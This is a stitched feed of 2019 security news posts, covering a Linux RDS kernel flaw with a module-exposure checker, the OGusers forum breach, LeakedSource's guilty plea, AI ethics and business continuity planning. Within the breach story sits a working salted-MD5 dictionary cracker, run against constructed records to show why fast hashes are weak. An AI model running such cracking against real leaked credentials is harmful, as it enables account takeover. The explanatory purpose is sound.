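            "rds_blocked": rds_blocked, "verdict": verdict}


def read_host():
    """Run assess() against the live files of the current Linux host."""
    release = Path("/proc/sys/kernel/osrelease").read_text().strip()
    modules = Path("/proc/modules").read_text()
    confs = "\n".join(Path(p).read_text() for p in glob.glob("/etc/modprobe.d/*.conf"))
    return assess(release, modules, confs)


# Constructed samples: a kernel with rds_tcp loaded, a modprobe.d file mirroring
# the Ubuntu default quoted in the text, and a hardened variant.
PROC_MODULES_SAMPLE = """\
rds_tcp 28672 0 - Live 0x0000000000000000
rds 204800 1 rds_tcp, Live 0x0000000000000000
ext4 737280 1 - Live 0x0000000000000000
"""
MODPROBE_SAMPLE = "# blacklist-rare-network.conf\nblacklist rds\n"
HARDENED_SAMPLE = "install rds /bin/false\ninstall rds_tcp /bin/false\n"

if __name__ == "__main__":
    print(assess("5.0.7-generic", PROC_MODULES_SAMPLE, MODPROBE_SAMPLE))
```

Note the ordering in assess(): a module that is already loaded makes the modprobe policy irrelevant, which is why the check reads /proc/modules first; a blacklist entry added after boot only helps on the next boot or after the module is unloaded.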


Pierluigi Paganini

(SecurityAffairs – Linux, CVE-2019-11815)

The post Linux kernel privilege escalation flaw CVE-2019-11815 affects RDS appeared first on Security Affairs.

Criminals Hack Forum Used for Trading Stolen Credentials

This is really interesting: a popular online forum that hackers have been using to trade stolen credentials has itself been hacked.

Reports confirm that OGusers, a popular online forum used by hackers to trade stolen account credentials, has been hacked, exposing the sensitive personal data of many of its users.

Brian Krebs writes, in his website KrebsOnSecurity, “Ogusers[.]com — a forum popular among people involved in hijacking online accounts and conducting SIM swapping attacks to seize control over victims’ phone numbers — has itself been hacked, exposing the email addresses, hashed passwords, IP addresses and private messages for nearly 113,000 forum users.”

It all started on May 12, when an administrator of OGusers told forum members that an outage had caused a hard drive failure, erasing several months’ worth of private messages, forum posts and prestige points. He also stated that he had restored a backup from January 2019. What the OGusers administrators apparently did not realize was that, coinciding with the outage, the forum’s user database had been stolen and its hard drives wiped. Four days later, on May 16, the administrator of the rival hacking community RaidForums uploaded the entire OGusers database for anyone to download for free.

The KrebsOnSecurity report quotes the message that RaidForums administrator Omnipotent has posted. It reads, “On the 12th of May 2019 the forum was breached [and] 112,988 users were affected. I have uploaded the data from this database breach along with their website source files. Their hashing algorithm was the default salted MD5 which surprised me, anyway the website owner has acknowledged data corruption but not a breach so I guess I’m the first to tell you the truth. According to his statement he didn’t have any recent backups so I guess I will provide one on this thread lmfao.”

Brian Krebs further says, “The database, a copy of which was obtained by KrebsOnSecurity, appears to hold the usernames, email addresses, hashed passwords, private messages and IP address at the time of registration for approximately 113,000 users (although many of these nicknames are likely the same people using different aliases).”

Experts point out that although the exposed passwords are hashed, the hashing algorithm was MD5, a fast legacy hash that can be brute-forced at very high speed even when salted, which puts all of the passwords at risk of recovery.
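To see why "salted MD5" is cold comfort, the following added example (not from KrebsOnSecurity or the RaidForums post) runs an offline dictionary attack against a constructed set of leaked rows. The exact construction, md5(salt + password), the three users, their salts and the word list are all assumptions and constructed data standing in for the forum's real scheme and records; the point is that the salt forces the attacker to re-hash every guess per user, and with MD5 that cost is negligible.

```python
"""Why salted MD5 barely slows an attacker once a forum database leaks.

Added example, not from KrebsOnSecurity or the RaidForums post. The leak is
described as "default salted MD5"; the construction used here,
md5(salt + password), and the records and word list are constructed stand-ins,
not the forum's real scheme or data. A salt defeats precomputed tables, but
with a fast hash it does nothing against per-user guessing.
"""
import hashlib
import time


def salted_md5(salt, password):
    """Hex digest of md5(salt || password), the assumed legacy scheme."""
    return hashlib.md5((salt + password).encode()).hexdigest()


def crack(records, wordlist):
    """Offline dictionary attack over leaked (user, salt, digest) rows.

    Every guess is re-hashed per user because of the salt, but MD5 makes that
    cheap. Returns {user: recovered_password} for the rows that fell.
    """
    recovered = {}
    for user, salt, digest in records:
        for candidate in wordlist:
            if salted_md5(salt, candidate) == digest:
                recovered[user] = candidate
                break
    return recovered


def guesses_per_second(seconds=0.2):
    """Measure this interpreter's salted-MD5 throughput (single core, pure Python)."""
    count, deadline = 0, time.perf_counter() + seconds
    while time.perf_counter() < deadline:
        salted_md5("x9", str(count))
        count += 1
    return count / seconds


def slow_hash(salt, password):
    """What a forum should use instead: a memory-hard KDF (scrypt; parameters for illustration)."""
    return hashlib.scrypt(password.encode(), salt=salt.encode(),
                          n=2 ** 14, r=8, p=1, dklen=32).hex()


def build_sample_leak():
    """Constructed leak: three users, per-user salts, two weak passwords and one strong one."""
    users = [
        ("alice", "3f", "hunter2"),
        ("bob", "a7", "letmein"),
        ("carol", "c1", "correct horse battery staple"),
    ]
    return [(user, salt, salted_md5(salt, pw)) for user, salt, pw in users]


# Constructed word list; real attacks use millions of entries plus mangling rules.
WORDLIST = ["123456", "password", "hunter2", "qwerty", "letmein"]

if __name__ == "__main__":
    leak = build_sample_leak()
    print("recovered:", crack(leak, WORDLIST))
    print(f"~{guesses_per_second():,.0f} salted-MD5 guesses/s in pure Python; "
          "GPU crackers manage billions")
```

Only carol survives, and only because her password is not in the list; the salt played no part. The comparison to make for yourself is the per-hash cost of `slow_hash`, which is deliberately large so that the same word list takes hours per user rather than milliseconds.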

Since OGusers is already known as a forum that attracts people who hijack phone numbers to take over victims' social media, financial accounts, email, etc., and sell such access for thousands of dollars, the exposure has caused shock among many in the community. Anxious members responded promptly and, according to Brian Krebs, some of them even complained of being targeted by phishing emails. It is also reported that some members expressed anger at the main administrator of OGusers. Members even seemed to claim that the main administrator, who uses the nickname 'Ace', altered the functionality of the forum following the hack so as to prevent users from removing their accounts.

On the other hand, reports say that an OGusers administrator commented, after the hack was disclosed, that though members' frustration is understandable, it should be noted that even Twitter, Facebook and other forums people have used have been breached more than once.

Brian Krebs concludes his report with a very relevant remark. He says, “It’s difficult not to admit feeling a bit of schadenfreude in response to this event. It’s gratifying to see such a comeuppance for a community that has largely specialized in hacking others. Also, federal and state law enforcement investigators going after SIM swappers are likely to have a field day with this database, and my guess is this leak will fuel even more arrests and charges for those involved.”


The post Criminals Hack Forum Used for Trading Stolen Credentials appeared first on .

Recent MuddyWater-associated BlackWater campaign shows signs of new anti-detection techniques

This blog was authored by Danny Adamitis, David Maynor, and Kendall McKay

Executive summary

Cisco Talos assesses with moderate confidence that a campaign we recently discovered called “BlackWater” is associated with suspected persistent threat actor MuddyWater. Newly associated samples from April 2019 indicate attackers have added three distinct steps to their operations, allowing them to bypass certain security controls and suggesting that MuddyWater’s tactics, techniques and procedures (TTPs) have evolved to evade detection. If successful, this campaign would install a PowerShell-based backdoor onto the victim’s machine, giving the threat actors remote access. While this activity indicates the threat actor is taking steps to improve its operational security and avoid endpoint detection, the underlying code remains unchanged. The findings outlined in this blog should help threat hunting teams identify MuddyWater’s latest TTPs.


The post Recent MuddyWater-associated BlackWater campaign shows signs of new anti-detection techniques appeared first on Cisco Blog.

Episode 496 – The Most Dangerous Email Attachment Types

Email is still the number one communication method used today. People also use it primarily to send files back and forth. Even though you may know and trust a source, you should still be cautious about the file types being sent and have security controls in place to ensure those files do not inadvertently cause problems. […]

The post Episode 496 – The Most Dangerous Email Attachment Types appeared first on Security In Five.

How to Get the Best Layered and Integrated Endpoint Protection

Security teams have historically been challenged by the choice of separate next-gen endpoint security technologies or a more integrated solution with a unified management console that can automate key capabilities.

At this point it’s not really a choice at all – the threat landscape requires you to have both. The best layered and integrated defenses now include a broad portfolio of advanced prevention technologies, endpoint security controls, and advanced detection/response tools – all within an integrated system that goes beyond alerts and into insights that even a junior analyst can act on.

More Endpoints = More Vulnerabilities

Endpoints now extend far beyond on-premises servers, PCs, and traditional operating systems. Internet of things devices such as printers, scanners, point-of-sale handhelds, and even wearables are vulnerable and can provide entry points for organized attacks seeking access to corporate networks. Mobile devices—both BYOD and corporate issued—are among the easiest targets for app-based attacks. Per the 2019 McAfee Mobile Threat Report, the number one threat category was hidden apps, which accounted for almost one-third of all mobile attacks.

Many enterprises are unaware of their target-rich endpoint environments, resulting in security teams struggling to maintain complete vigilance. A 2018 SANS Survey on Endpoint Protection and Response revealed some sobering statistics:

  • 42% of respondents report having had their endpoints exploited
  • 84% of endpoint breaches include more than one endpoint
  • 20% didn’t know whether they’d been breached

Endpoint attacks are designed to exploit the hapless user, including web drive-by, social engineering/phishing, and ransomware. Because these attacks rely on human actions, there’s a need for increased monitoring and containment, along with user education.

The latest attacks have the ability to move laterally across your entire environment, challenging every endpoint until a vulnerability is found. Once inside your walls, all endpoints become vulnerable. Modern endpoint security must extend protection across the entire digital terrain with visibility to spot all potential risks.

Fewer Consoles = Better Efficiency

A 2018 MSA Research report on security management commissioned by McAfee revealed that 55% of organizations struggle to rationalize data when three or more consoles are present. Too many security products, devices, and separate consoles call for a large budget and additional employees who might struggle to maintain a secure environment.

In contrast, a single management console can efficiently coordinate the defenses built into modern devices while extending their overall posture with advanced capabilities—leaving nothing exposed. With ever-changing industry requirements, an integrated endpoint security approach ensures that basic standards and processes are included and up to date.

Why McAfee Endpoint Security

McAfee offers a broad portfolio of security solutions that combine established capabilities (firewall, reputation, and heuristics) with cutting-edge machine learning and containment, along with endpoint detection and response (EDR) into a single-agent all-inclusive management console.

Is it time you took a fresh look at your strategy? Learn more in this white paper: Five ways to rethink your endpoint protection strategy.

The post How to Get the Best Layered and Integrated Endpoint Protection appeared first on McAfee Blogs.

Ecuador Shares Assange’s Legal Docs with US


Complying with a request by US authorities, Ecuadorian officials are preparing to hand over documents that are reportedly the entire legal defense against Julian Assange, compiled during the time he has been living in the Ecuadorian embassy in London, according to WikiLeaks.

"On Monday Ecuador will perform a puppet show at the embassy of Ecuador in London for their masters in Washington, just in time to expand their extradition case before the UK deadline on 14 June," WikiLeaks editor-in-chief Kristinn Hrafnsson said. "The Trump administration is inducing its allies to behave like it's the Wild West."

Assange’s lawyers are reportedly not permitted to be present during what is being called the “illegal seizure of his property.”

“The material includes two of his manuscripts, as well as his legal papers, medical records and electronic equipment. The seizure of his belongings violates laws that protect medical and legal confidentiality and press protections,” WikiLeaks said.

Ecuadorian officials also refused a request by the UN special rapporteur on privacy, who asked for permission to monitor Ecuador's seizure of Assange's property.

The US had previously asked Ecuador to share audiovisual material and additional documents, which had reportedly been collected during an internal spying operation against Assange, WikiLeaks said.

"It is extremely worrying that Ecuador has proceeded with the search and seizure of property, documents, information and other material belonging to the defense of Julian Assange, which Ecuador arbitrarily confiscated, so that these can be handed over to the agent of political persecution against him, the United States. It is an unprecedented attack on the rights of the defence, freedom of expression and access to information exposing massive human rights abuses and corruption. We call on international protection institutions to intervene to put a stop to this persecution," said Baltasar Garzón, international legal coordinator for the defense of Assange and WikiLeaks.

Though Ecuador is obviously not a part of the EU, "if arguing that because Assange is an EU resident and therefore subject to the protections of GDPR, Article 23 makes a pretty strong case that those protections become restricted if revealing that data was a matter of national defense or if some other form of legal matter, either criminal or civil, is involved,” said Nathan Wenzler, senior director of cybersecurity at Moss Adams.

“While I’m not a lawyer, it seems likely that all nations involved would have a good chance of demonstrating some sort of legal action involved here and thus, make this action a non-event under the provisions of GDPR. Morally, there’s a whole other argument here that could (and should, in my opinion) be had. However, I’m not sure there’s much that can or will be done under GDPR in this case.”

Publishers and Privacy: How Ad-Supported Websites Can Manage Privacy and Minimize Risk

Content publishers, media and other advertising-supported websites have already had to grapple with the privacy requirements put forth in the EU General Data Protection Regulation (GDPR). Similar regulations are also in force in a number of other countries in the Americas, Europe and Asia. In addition, at the start of 2020, publishers will have to comply with the California Consumer Privacy Act (CCPA). Still more privacy regulations are being advanced and debated in other U.S. states, and around the world. In fact, more than ten different U.S. states, including Massachusetts and Texas, are in the process of considering privacy laws … Continue reading Publishers and Privacy: How Ad-Supported Websites Can Manage Privacy and Minimize Risk

The post Publishers and Privacy: How Ad-Supported Websites Can Manage Privacy and Minimize Risk appeared first on TrustArc Blog.

Why AI Innovation Must Reflect Our Values in Its Infancy

In my last blog, I explained that while AI possesses the mechanics of humanness, we need to train the technology to make the leap from mimicking humanness with logic, rationality and analytics to emulating humanness with common sense. If we evolve AI to make this leap the impact will be monumental, but it will require our global community to take a more disciplined approach to pervasive AI proliferation. Historically, our enthusiasm for and consumption of new technology has outpaced society's ability to evolve legal, political, social, and ethical norms.

I spend most of my time thinking about AI in the context of how it will change the way we live. How it will change the way we interact, impact our social systems, and influence our morality.  These technologies will permeate society and the ubiquity of their usage in the future will have far reaching implications. We are already seeing evidence of how it changes how we live and interact with the world around us.

Think Google. It excites our curiosity and puts information at our fingertips. What is tripe – should I order it off the menu? Why do some frogs squirt blood from their eyes? What does exculpatory mean?

AI is weaving the digital world into the fabric of our lives and making information instantaneously available with our fingertips.

AI-enabled technology is also capable of anticipating our needs. Think Alexa. As a security professional I am a holdout on this technology, but the allure of it is indisputable. It makes the digital world accessible with a voice command. It understands more than we may want it to – did someone tell Alexa to order coffee pods and toilet tissue, and if not, how did Alexa know to order toilet tissue? Maybe some things I just don't want to know.

I also find it a bit creepy when my phone assumes (and gets it right) that I am going straight home from the grocery store letting me know, unsolicited, that it will take 28 minutes with traffic. How does it know I am going home? I could be going to the gym. It’s annoying that it knows I have no intention of working out. A human would at least have the decency to give me the travel time to both, allowing me to maintain the illusion that the gym was an equal possibility.

On a more serious note, AI-enabled technology will also impact our social, political and legal systems. As we incorporate it into more products and systems, issues related to privacy, morality and ethics will need to be addressed.

These questions are being asked now, but in anticipation of AI becoming embedded in everything we interact with it is critical that we begin to evolve our societal structures to address both the opportunities and the threats that will come with it.

The opportunities associated with AI are exciting.  AI shows incredible promise in the medical world. It is already being used in some areas. There are already tools in use that leverage machine learning to help doctors identify disease related patterns in imaging. Research is under way using AI to help deal with cancer.

For example, in May 2018, The Guardian reported that skin cancer research using a convolutional neural network (CNN – based on AI) detected skin cancer 95% of the time compared to human dermatologists who detected it 86.6% of the time. Additionally, facial recognition in concert with AI may someday be commonplace in diagnosing rare genetic disorders, that today, may take months or years to diagnose.

But what happens when the diagnosis made by a machine is wrong? Who is liable legally? Do AI-based medical devices also need malpractice insurance?

The same types of questions arise with autonomous vehicles. Today it is always assumed a human is behind the wheel in control of the vehicle. Our laws are predicated on this assumption.

How must laws change to account for vehicles that do not have a human driver? Who is liable? How does our road system and infrastructure need to change?

The recent Uber accident case in Arizona determined that Uber was not liable for the death of a pedestrian killed by one of its autonomous vehicles. However, the safety driver, who was watching TV rather than the road, may be charged with manslaughter. How does this change when the car's occupants are no longer safety drivers but simply passengers in fully autonomous vehicles? How will laws need to evolve at that point for cars and other types of AI-based "active and unaided" technology?

There are also risks to be considered in adopting pervasive AI. Legal and political safeguards need to be considered, either in the form of global guidelines or laws. Machines do not have a moral compass. Given that the definition of morality may differ depending on where you live, it will be extremely difficult to train morality into AI models.

Today most AI models lack the ability to determine right from wrong, ill intent from good intent, morally acceptable outcomes from morally reprehensible outcomes. AI does not understand whether the person asking the questions, providing it data or giving it direction has malicious intent.

We may find ourselves on a moral precipice with AI. The safeguards or laws I mention above need to be considered before AI becomes more ubiquitous than it already is. AI will enable humankind to move forward in ways previously unimagined. It will also provide a powerful conduit through which humankind's greatest shortcomings may be amplified.

The implications of technology that can profile entire segments of a population with little effort are disconcerting in a world where genocide has been a tragic reality, where civil obedience is coerced using social media, and where trust is undermined by those who use misinformation to sow political and societal discontent.

There is no doubt that AI will make this a better world. It gives us hope on so many fronts where technological impasses have impeded progress. Science may advance more rapidly, medical research progress beyond current roadblocks and daunting societal challenges around transportation and energy conservation may be solved.  It is another tool in our technological arsenal and the odds are overwhelmingly in favor of it improving the global human condition.

But realizing its advantages while mitigating its risks will require commitment and hard work from many conscientious minds from different quarters of our society. We as the technology community have an obligation to engage key stakeholders across the legal, political, social and scientific community to ensure that as a society we define the moral guardrails for AI before it becomes capable of defining them, for or in spite of, us.

Like all technology before it, AI’s social impacts must be anticipated and balanced against the values we hold dear.  Like parents raising a child, we need to establish and insist that the technology reflect our values now while its growth is still in its infancy.

The post Why AI Innovation Must Reflect Our Values in Its Infancy appeared first on McAfee Blogs.

New South Wales Announces New Cybersecurity Position


In an attempt to centralize all of the state's cyber efforts and strategies, New South Wales (NSW) has announced a new Cyber Security NSW office to be led by Tony Chapman, chief cybersecurity officer, according to a May 20 press release.

Chapman assumed the position today, which falls under the department of customer service, and wrote via LinkedIn, “The changes reflect the leadership and coordination role required to uplift cyber security and decision-making across NSW Government.

I am performing the functions previously undertaken by the NSW Government Chief Information Security Officer (GCISO), established in March 2017, with a renewed focus on securing digital transformation and the continual improvement of customer service outcomes.”

To enable digital transformation, a part of the overall vision of the new customer service cluster, the office will focus on improving cybersecurity capabilities and standards to include a coordinated cyber-incident response plan and develop strategic cyber-policy positions through a revitalized cybersecurity senior officers’ group (CSSOG), according to Chapman.

To see the vision of the new customer service cluster to its fruition, Chapman said he will work to strengthen ties across NSW's government, other states' governments and the federal government to establish cybersecurity best practices that will yield better results for citizens.

“A key component of the role will be driving a culture of risk management and awareness to support greater resilience to cyber security threats. Tony and his team will build on the digital transformation work occurring across the NSW government, ensuring our digital spaces are safeguarded against cyber threats,” said the state government's chief information and digital officer, Greg Wells, in the press release.

“Cybersecurity NSW will continue its critical work enhancing whole-of-government cyber security capabilities and standards on behalf of NSW. It will also work more closely with the information and privacy commission on security, privacy and the availability of systems and services during the State’s digital transformation.”

Don’t have your account hijacked. Secure your online accounts with more than a password, says Google

Research published at the end of last week argues that the typical user can significantly harden the security of their online accounts by linking a recovery phone number that can send an alert if there is suspicious activity on the account.

Read more in my article on the Hot for Security blog.

Online Account Hijacker Forum OGUsers Hacked


An online forum used by those involved in online account hijacking has been breached, according to KrebsonSecurity.

An attack on leaked the personal information of nearly 113,000 people. Krebs reportedly received a copy of the database, which included usernames, email addresses, hashed passwords, private messages and IP address.

The RaidForums administrator Omnipotent announced to forum members that he had made the OGUsers forum database available for download, writing:

Hello RaidForums Community,

Today I have uploaded the OGUsers Forum Database for you to download for free, thanks for reading and enjoy!

On the 12th of May 2019 the forum was breached 112,988 users were affected. I have uploaded the data from this database breach along with their website source files. Their hashing algorithm was the default salted MD5 which surprised me, anyway the website owner has acknowledged data corruption but not a breach so I guess I'm the first to tell you the truth view his statement here or if you don't want to visit their website view it here. According to his statement he didn't have any recent backups so I guess I will provide one on this thread lmfao.

Compromised data: Website activity, Usernames, Emails, IP Addresses, Passwords (Salted MD5), Source code, Website data, User private messages.

While users on the forum expressed concern about their identities being revealed as a result of the hack, Krebs said, “It’s difficult not to admit feeling a bit of schadenfreude in response to this event. It’s gratifying to see such a comeuppance for a community that has largely specialized in hacking others. Also, federal and state law enforcement investigators going after SIM swappers are likely to have a field day with this database, and my guess is this leak will fuel even more arrests and charges for those involved.”

Defiant Tech firm who operated LeakedSource pleads guilty

The Royal Canadian Mounted Police (RCMP) announced that Defiant Tech Inc., the company behind the LeakedSource website, has pleaded guilty in Canada.

The LeakedSource website was launched in late 2015; in January 2017 the popular data breach notification website was raided by the feds.

It reported some of the largest data breaches, including the ones that affected Last.fm, Rambler.ru, FriendFinder Networks, LinkedIn, and MySpace.


In December 2017, Canadian man Jordan Evan Bloom (27) was charged in connection with the leak of 3 billion hacked accounts; he was running a website that collected personal data and login credentials from the victims.

The man was charged as part of an investigation dubbed "Project Adoration" into trafficking in personal data, unauthorized use of computers, and possession of illicitly obtained property.

The RCMP alleges that Bloom was the administrator of the website, which operated through his company Defiant Tech.

LeakedSource offered for sale access to data gathered from the victims of security breaches, sometimes buying it from hackers.

For $2 a day, a LeakedSource subscriber could obtain the details of an individual by entering an email address or username. LeakedSource also cracked the associated passwords when it was possible. The website was very popular among the users of the

“A guilty plea was entered in court today by Defiant Tech Inc., to the charges of Trafficking In Identity Information and Possession of Property Obtained By Crime a year and a half after charges were laid into the RCMP’s cybercrime investigation dubbed Project “Adoration”. ” reads the press release published by RCMP.

“ had a database of approximately three billion personal identity records and associated passwords that could be purchased for a small fee. Defiant Tech Inc. was operating the website and the company earned approximately $247,000 from trafficking identity information. “

The arrest of Bloom was the result of a joint effort by Canadian authorities, the FBI and the Dutch National Police.

According to the Royal Canadian Mounted Police, Defiant Tech made around CAN$247,000 (US$183,000) from its illegal activities.

“We are pleased with this latest development,” said Superintendent Mike Maclean, Officer in Charge Criminal Operations of the RCMP National Division. “I am immensely proud of this outcome as combatting cybercrime is an operational priority for us.”

According to the experts, Bloom did not operate the website alone; at least one other person, a US citizen, was involved, but that person has not been charged.


Pierluigi Paganini

(SecurityAffairs – cybercrime, LeakedSource)

The post Defiant Tech firm who operated LeakedSource pleads guilty appeared first on Security Affairs.

How to write a business continuity plan: the easy way

Earthquake. Flood. Cyber attack. The threat of disruption looms over organisations more ominously than ever, thanks to the increasing infiltration of technology in business processes, consumer expectations and the rapid rise in cyber crime.

You’ll rarely get advance warning about disruptions, so you need to prepare for whatever might come your way with a BCP (business continuity plan).

In this blog, we explain how a BCP works, what it covers and how to create one.

What is a business continuity plan?

A BCP outlines the processes and procedures that an organisation must follow to continue operating in the event of a disruption. The steps outlined in a BCP are typically a set of temporary measures or quick fixes to ensure that the most important business operations remain functional, even if at the cost of overall productivity.

Organisations’ top priorities tend to be their technologies, and for good reason. Network connections, online systems, phone lines, network drives, servers and business applications are all vulnerable to a range of disruptions and can cause huge headaches if they are compromised.

But business continuity planning isn’t about recovering IT. It’s primarily concerned with critical activities that, if disrupted, could immediately jeopardise your productivity or the availability of your services. In that regard, it simply considers IT a critical resource for preserving those activities – in other words, a dependency.

However, recovering your IT may take some time, so you should have a plan on how to manage in the meantime. Such temporary solutions may well be lo-fi; even so, organisations must outline them in a BCP to ensure employees know what’s expected of them.

Business continuity vs disaster recovery

BCPs shouldn’t be confused with DRPs (disaster recovery plans), even though they both tackle the immediate aftermath of a disruption.

Business continuity focuses primarily on ensuring that you maintain functionality – even if at reduced capacity – in the event of an incident while attending to the disruption. Disaster recovery is a purely corrective measure that looks to recover to full IT functionality as quickly as possible.

These concepts might sound similar, but business continuity's focus on reviving the most critical business functions first is a crucial difference, and one that makes it a good idea to separate it from disaster recovery. Disaster recovery is usually applied only in an IT context, because partially working technology is often of little use to operations, yet full recovery may take some time.

Business continuity recognises that time is of the essence, and often involves temporary fixes that ensure vital operations continue. Recovery is also time-sensitive; temporary solutions don’t tend to offer the same level of productivity, so you don’t want to rely on them for long.

Whether taking a disaster recovery or business continuity approach, your objective should be to create a plan that buys you enough time to recover within an acceptable timeframe as defined by your RTO (recovery time objective). Just remember that business continuity has to consider two timeframes: when to be up and running again, and when to be back to full functionality.

Common threats to business continuity

Most disruptions that you will experience fall into one of these categories:

  • Natural disasters

Earthquakes, hurricanes and wildfires might spring to mind when you think of natural disasters, and although they often disrupt business, you only need to worry about them if you live in a part of the world where they are known to occur.

However, natural disasters also include snowstorms, heavy wind and floods, which are less dependent on geography but can still disrupt business, and which you should therefore plan for.

  • Man-made disasters

Your main concern in this category should be events that damage or disrupt transport routes, like car accidents and train crashes. If a major road or rail network is shut down, you might be unable to receive deliveries, and employees and customers might not be able to reach you.

Other man-made disasters include oil spills, terrorist acts, industrial accidents and acts of war.

  • Utility failures

Electrical fires and burst pipes can cause huge problems for organisations and are liable to occur at any time.

A fire or flood could damage expensive equipment or require a room to be vacated. If a sewage line is broken, the sanitary risk (not to mention the smell) could force the organisation to send its employees home.

  • Technological failures

Sometimes technology simply stops working. Systems crash, files are lost and documents go missing. The causes of technological failures are so varied and unpredictable that you cannot anticipate how or when they will occur; treat them as an ever-present risk that will materialise at some point, and be ready for when it does.

  • Human error

An organisation’s staff is often its biggest security weakness. Employees will lose or accidentally expose data from time to time, and although staff awareness training will reduce the risk, it won’t eradicate the threat. Humans inevitably make mistakes, and you need to be aware of that when planning for disruptions.

  • Sabotage

Employees might also breach data deliberately. This typically happens if they are disgruntled at work (maybe they were turned down for a promotion) or have left the organisation acrimoniously and their login credentials are still active.

There’s also the possibility that staff will simply be lured by the financial gain from stealing sensitive information and selling it on the dark web.

  • Cyber attacks

The most frequent examples of cyber attacks include phishing emails (which are designed to steal information), brute-force attacks (in which crooks use automated software to crack an employee’s password) and ransomware (which locks down an organisation’s system until a fee is paid).

These are far from the only threats you need to plan for, though. Organisations’ networks and the applications used will contain dozens of vulnerabilities that crooks are always looking to exploit.

Why business continuity planning is so important

The most obvious reason to implement a BCP is to ensure that your organisation remains productive in the event of a disruption. Customers must still be able to use your services, employees must be able to continue doing their job and you can’t allow yourself to face a huge backlog of work as the delay continues.

But business continuity isn’t only about short-term goals. The cyber security landscape has become increasingly volatile in recent years, with cyber crime continuing to spiral and organisations’ reliance on technology leading to vast numbers of accidental and deliberate data breaches. As a result, organisations need to prove to customers and stakeholders that they are prepared for anything.

Business continuity is especially important for OES (operators of essential services) and DSPs (digital service providers), as a disruption could cause major problems for a large section of the population. To ensure that such organisations are sufficiently prepared for risks, the EU adopted the NIS Directive, which was transposed into UK law as the NIS (Network and Information Systems) Regulations 2018.

DSPs within the Regulations’ scope are explicitly required to put business continuity measures in place. Although the same isn’t true of OES, they should still consider implementing a BCP as a means of providing a more reliable service.

Benefits of business continuity planning

Beyond the obvious reasons to implement a BCP (to remain functional in the event of a disruption), you should also consider its ability to:

  • Protect your organisation’s reputation: A fast and efficient response to disruption reassures customers and the public about the way you operate. This will mitigate the negative sentiment that accompanies a loss of productivity, and it might even improve your reputation.
  • Boost employees’ morale: No one wants to work in a chaotic environment, so your staff will be pleased to know that management has a plan in case things go wrong. If the plan is well written (which we’ll show you how to do shortly), everyone in the organisation will be accounted for, which will prove to employees that management has considered their needs.
  • Build your relationship with third parties and subsidiaries: An effective BCP demonstrates that the organisation is being run well from top to bottom, which will encourage anyone that you work with. It shows that you are a reliable partner that has taken into account its responsibilities to customers, employees and partners.

Writing your business continuity plan: 8 simple steps

  1. Purpose and scope of the BCP

Your first task is to define the purpose and scope of the plan. This is especially relevant if your organisation comprises several subsidiaries or is based in different locations, as each one will have its own requirements.

If this is the case, it’s up to you to decide whether to create one plan that covers each subsidiary/location separately or to focus on just one part of your business.

  2. Responsibilities

The next step is to decide which employee(s) will be responsible for enacting the plan. You might opt to put one person in charge of the plan or delegate responsibility to people across your organisation.

Small organisations might be able to get away with a single leader, as there’s a good chance that a senior member of staff will have oversight of every department and its needs. However, if that’s not the case, a group of employees will need to share responsibility.

You also need to identify who has the authority to grant financial costs outside of the normal department budget. This could be the same person (or people) responsible for enacting the plan, or it could be a specific duty assigned to someone else.

  3. Invoking the BCP

This step defines when and how the plan will take effect. After all, it’s not always clear that a serious (and possibly planned-for) disruption has occurred; it’ll often begin with, say, the office lights going out and employees looking across the room at each other asking: ‘What’s going on?’

It’s only when someone takes charge that you can determine what caused the problem and how to respond. You don’t need to get into specifics here (that’s covered in step four), but you do need to document who will get the process started, how response teams will be mobilised and where those responsible for enacting the plan should meet.

  4. Specific BCP content

This is the meat of your plan, containing the actions you will take to recover from various incidents. It will be the result of two other processes – the risk assessment and BIA (business impact analysis) – in which you identify the threats you face and the way your organisation will be affected by them.

Once you’ve collected this information, you should take each business disruption and outline:

  • Steps that must be taken to protect individuals (staff, customers and third parties) during the business disruption;
  • Actions that should be taken to contain the disruption and prevent further loss, disturbance or unavailability of prioritised activities;
  • Guidelines on record-keeping requirements during and after the incident (such as what needs to be recorded and where);
  • Prioritised recovery objectives and the actions and resources that are needed to achieve them; and
  • Internal and external (inter)dependencies and interactions, and how these might impact one another during a disruptive incident.

  5. Communications

This stage focuses on internal and external communications. Internal communication refers to the way you will keep employees informed about the state of the business, something that’s particularly important if your usual modes of communication are disabled due to the disruption.

In the event of serious disruptions, you should also consider contacting employees’ next of kin to update them of their wellbeing. This is both thoughtful and prevents your organisation’s phone lines being jammed by concerned family members.

External communication refers to the way you will deal with the media regarding the incident. If the disruption is severe enough, you should release a statement explaining the nature of the incident, what has been affected and how you are responding. In extreme cases, you might also be obliged to give interviews, in which case you should decide who will represent your organisation and what your strategy will be.

  6. Stakeholders

You will be required to contact stakeholders as soon as possible following a disruption, so your BCP should contain their contact details for easy reference.

  7. Appoint a business continuity manager

The business continuity manager is responsible for documenting the plan and keeping it safe. They are also responsible for reviewing the plan to make sure the information is accurate. For example, if someone with BCP responsibilities leaves the organisation, the business continuity manager should flag this, so the team can appoint a successor.

  8. Change management

Once the plan is finalised, it should be published in hard copy and as a digital file, and be made accessible to all members of staff.

Every time changes are made to the BCP, you must ensure that the digital and hard-copy forms are updated.

Don’t forget to test your plan

The only way to be sure that your plan works is by testing (or ‘validating’) it. How often you test the plan is up to you, but we recommend doing it at least twice a year or whenever there are substantial changes to your organisation.

There are three types of test that you can conduct:

a. Table-top exercise

A table-top exercise is essentially a read-through of the plan. Senior employees and those with BCP responsibilities should go through the plan together, looking for gaps and ensuring that all business units are represented.

b. Structured walkthrough

A structured walkthrough is like a rehearsal, with each team member role-playing their responsibilities according to specified disruptions. The objective is to familiarise employees with their responsibilities and to make sure the plan works as intended.

You might choose to simulate the process across the entire organisation, but it can obviously be difficult to make everyone available at the same time, particularly given that the walkthrough will probably have to occur outside of office hours. As such, you might choose to split the walkthrough across the week, with one or two departments playing out a disaster at a time.

c. Disaster simulation testing

A disaster simulation test is essentially a dress rehearsal. You create a test environment that simulates an actual disaster across the entire organisation and then put the plan into action.

Unlike other types of test, you aren’t looking for gaps as you go. Instead, you should see the plan through to its conclusion, so you know exactly what the consequences of your actions (or lack thereof) are. Only after you’ve seen the plan through to the end should you review your actions and look for ways to improve.

Business continuity planning made simple

Anyone looking for help on how to develop and document their BCP should take a look at our free BCP template.

It expands on the eight steps we’ve listed in this article, showing you exactly how to structure your plan.


The post How to write a business continuity plan: the easy way appeared first on IT Governance Blog.

Six Best Password Managers for Online Protection in 2019

